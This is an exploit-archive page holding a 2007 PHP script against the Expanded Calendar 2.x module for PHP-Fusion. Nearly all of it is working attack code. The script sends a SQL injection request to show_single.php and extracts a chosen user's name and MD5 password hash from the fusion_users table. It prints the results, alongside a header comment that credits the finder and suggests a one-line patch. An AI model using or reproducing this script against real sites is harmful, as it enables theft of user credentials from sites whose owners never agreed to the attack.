Home / os / winme

phpfusionex-sql.txt

Posted on 02 October 2007

<?php print_r(" /******************************************************** * Expanded Calendar 2.x (PHP-Fusion module) * * User pass disclosure exploit * * Found by Matrix86 of Rbt-4 Crew * * Site: www.rbt-4.net * * Mail: info[at]rbt-4[dot]net * ********************************************************* * Bug found in * * /infusions/calendar_events_panel/show_single.php * * Line: * * 27 * * Vulnerability type: Sql injection * * Unpatched! * * Patch: * * Line 26: * * if(!isset($sel)||!isNum($sel)) fallback("index.php"); * ********************************************************/ "); if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id] Example: ".$argv[0]." localhost /php-fusion/ 1 "); ini_set("max_execution_time",0); ini_set("default_socket_timeout",4); $host = $argv[1]; $path = $argv[2]; $user_id = $argv[3]; $port = 80; $sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id="; $sqlend = "/*"; function send($req){ global $host,$port; $ip = gethostbyname($host); if(stristr($host,$ip)) die("Error: Host not found "); if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock! "); fputs($sock,$req); $response = ""; while (!feof($sock)) { $response .= fgets ($sock,128); } fclose ($sock); return $response; } $packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0 "; $packet.= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) "; $packet.= "Host: ".$host." "; $packet.="Connection: Close "; echo "Packet: ".$packet." "; $resp = send($packet); $temp = explode("<td colspan='2'><font size='4'><u>",$resp); $temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]); $temp3 = explode("</td>",$temp2[1]); $username = $temp3[0]; if(isset($temp[1])) { $md5 = substr($temp[1],0,32); echo "Id user: ".$user_id." Username: ".$username." Password: ".$md5." "; } else echo("Bug Fixed..sorry! "); exit(); ?>

 

TOP